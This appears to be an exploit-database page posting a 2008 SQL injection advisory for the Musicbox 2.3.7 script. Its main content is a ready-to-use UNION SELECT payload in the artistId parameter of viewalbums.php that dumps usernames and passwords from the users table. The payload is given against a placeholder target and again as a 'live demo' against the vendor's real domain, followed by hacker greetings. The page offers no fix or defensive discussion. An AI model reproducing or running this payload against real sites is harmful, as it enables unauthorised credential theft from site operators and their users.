[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Musicbox <= 2.3.7 (artistId) Remote SQL Injection Vulnerability

Author
HaCkeR_EgY
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2972
Category
web applications
Date add
06-05-2008
Platform
unsorted
===============================================================
Musicbox <= 2.3.7 (artistId) Remote SQL Injection Vulnerability
===============================================================




#########################################
#    Rem0te SQL Injection Vulnerability #
#       Musicbox [viewalbums.php]       #
########################################

[<>]Author: HaCkeR-EgY

===========================================================
[<>]Script : Musicbox
 
[<>]version : Version 2.3.6 / 2.3.7
 
[<>]Script Price: Only $ 255.00
 
[<>]Download : www.musicboxv2.com
============================================================
 
[<>] D0RK : ... you know
 
[<>] ExPLO!t :
             
  ===>
http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
 
[<>] live DemO :
            
  ===>
  http://www.musicboxv2.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
==============================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[<>] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
                   Gold_M , V4 Team , Jiki Team  , RoMaNcYxHaCkEr
===============================================================



#  0day.today [2024-12-26]  #